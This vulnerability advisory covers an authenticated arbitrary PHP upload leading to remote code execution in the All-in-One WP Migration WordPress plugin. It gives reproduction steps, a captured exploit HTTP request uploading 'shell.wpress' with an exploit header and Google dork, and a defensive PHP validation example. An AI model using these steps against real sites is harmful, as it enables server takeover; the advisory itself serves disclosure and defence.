| CVSS3 metric | Value |
|---|---|
| Base score | 7.2 High |
| Attack Vector | NETWORK |
| Attack Complexity | LOW |
| Privileges Required | HIGH |
| User Interaction | NONE |
| Scope | UNCHANGED |
| Confidentiality Impact | HIGH |
| Integrity Impact | HIGH |
| Availability Impact | HIGH |
| Vector string | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |

| CVSS2 metric | Value |
|---|---|
| Base score | 6.5 Medium |
| Access Vector | NETWORK |
| Access Complexity | LOW |
| Authentication | SINGLE |
| Confidentiality Impact | PARTIAL |
| Integrity Impact | PARTIAL |
| Availability Impact | PARTIAL |
| Vector string | AV:N/AC:L/Au:S/C:P/I:P/A:P |
The plugin does not validate the extension of uploaded files, which allows administrators to upload PHP files to their site, even on multisite installations.
To reproduce:

- Log in, click All-in-One WP Migration > Import to use the import-from-file function.
- Intercept the `wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1` request.
- Change the parameters `upload-file`, `storage` and `archive`. Insert malicious PHP code into `upload-file`. Submit the request.
- Access the URL below to execute system commands: `wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive]`

```text
# Exploit Title: WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution
# Google Dork: inurl:/wp-admin/admin-ajax.php
# Date: 23/12/2020
# Exploit Author: YICHENGLIU_chenfeng lab
# Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/
# Version: All-in-One WP Migration <=7.38
# Tested on: windows 10(x64)
# data in http request :

POST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 HTTP/1.1
Host: 192.168.9.240
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797
Content-Length: 740
Origin: http://192.168.9.240
Connection: close
Cookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799

-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="upload-file"; filename="shell.wpress"
Content-Type: application/octet-stream
```
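The root cause above is that none of the three request-controlled values (`storage`, `archive`, and the multipart part) is validated before the upload is written under the storage directory. The following is an added example, not code from the All-in-One WP Migration plugin and not a patch of it, of how an import handler can enforce that check: each name is matched against a strict allowlist, the on-disk name is taken only from the validated `archive` token (never from the client-chosen part filename), and the storage directory is made non-servable by the web server. The function names and the `$storage_root` location are assumptions made for this illustration.

```php
<?php
// Added example, not the plugin's own code. It demonstrates the validation
// the report says is missing: every request-controlled name is checked
// against an allowlist before anything touches the filesystem, and the
// storage directory is denied to direct web access. Function names and the
// $storage_root argument are assumptions for illustration.
declare(strict_types=1);

// A storage sub-directory may only be named by a plain alphanumeric token:
// no slashes and no dots, so "../" and absolute paths cannot get through.
function is_safe_storage_token(string $storage): bool
{
    return preg_match('/^[A-Za-z0-9]{1,64}\z/', $storage) === 1;
}

// An archive may only be a plain basename with the single extension ".wpress".
// One rule rejects "shell.php", "shell.php.wpress", "shell.wpress.php",
// "shell.phtml", path separators, dot segments, NUL bytes and a trailing
// newline (hence \z rather than $, which would accept "x.wpress\n").
function is_valid_archive_name(string $archive): bool
{
    return preg_match('/^[A-Za-z0-9_-]{1,128}\.wpress\z/', $archive) === 1;
}

// Deny direct web access to the storage directory so that a file which
// somehow got there is never served or executed by Apache (mod_authz_core on
// 2.4, legacy directives on 2.2). This assumes archives are read only by the
// plugin's PHP code and never fetched by URL; nginx needs the equivalent
// "location ... { deny all; }" block in the server configuration instead.
function protect_storage_dir(string $dir): void
{
    $rules = "<IfModule mod_authz_core.c>\n    Require all denied\n</IfModule>\n"
           . "<IfModule !mod_authz_core.c>\n    Order deny,allow\n    Deny from all\n</IfModule>\n";
    $htaccess = $dir . DIRECTORY_SEPARATOR . '.htaccess';
    if (!is_file($htaccess)) {
        file_put_contents($htaccess, $rules, LOCK_EX);
    }
}

// Validate the three request-controlled values, then move the upload into
// place. Returns the stored path, or null when anything fails validation.
function store_uploaded_archive(array $file, string $storage, string $archive, string $storage_root): ?string
{
    if (!is_safe_storage_token($storage) || !is_valid_archive_name($archive)) {
        return null;
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $dir = $storage_root . DIRECTORY_SEPARATOR . $storage;
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return null;
    }
    protect_storage_dir($dir);

    // The client-chosen part filename ($file['name'], "shell.wpress" in the
    // captured request) is deliberately ignored; only the validated $archive
    // token decides the on-disk name. move_uploaded_file() additionally refuses
    // any source path that PHP did not itself receive as an upload.
    $dest = $dir . DIRECTORY_SEPARATOR . $archive;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640); // a data file, never executable
    return $dest;
}

// Self-check of the name rules when run from the command line
// (constructed inputs, including the "shell.*" names from the report).
if (PHP_SAPI === 'cli') {
    $cases = [
        'backup.wpress'     => true,
        'shell.php'         => false,
        'shell.php.wpress'  => false,
        'backup.wpress.php' => false,
        '../backup.wpress'  => false,
        "backup.wpress\n"   => false,
    ];
    foreach ($cases as $name => $expected) {
        if (is_valid_archive_name($name) !== $expected) {
            fwrite(STDERR, 'unexpected result for ' . json_encode($name) . "\n");
            exit(1);
        }
    }
    echo "archive name checks passed\n";
}
```

Inside the AJAX handler the call would look like `store_uploaded_archive($_FILES['upload-file'] ?? [], (string) ($_POST['storage'] ?? ''), (string) ($_POST['archive'] ?? ''), WP_CONTENT_DIR . '/ai1wm-storage')`, where the storage path is again an assumption. The two layers are independent on purpose: the allowlist stops a PHP file from being written under a `.wpress` name or any other name, and the deny-all rule means that even an archive that legitimately contains PHP source is never reachable through a URL, which is what turns an upload bug into remote code execution.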
| CPE | Name | Operator | Version |
|---|---|---|---|
| | all-in-one-wp-migration | lt | 7.41 |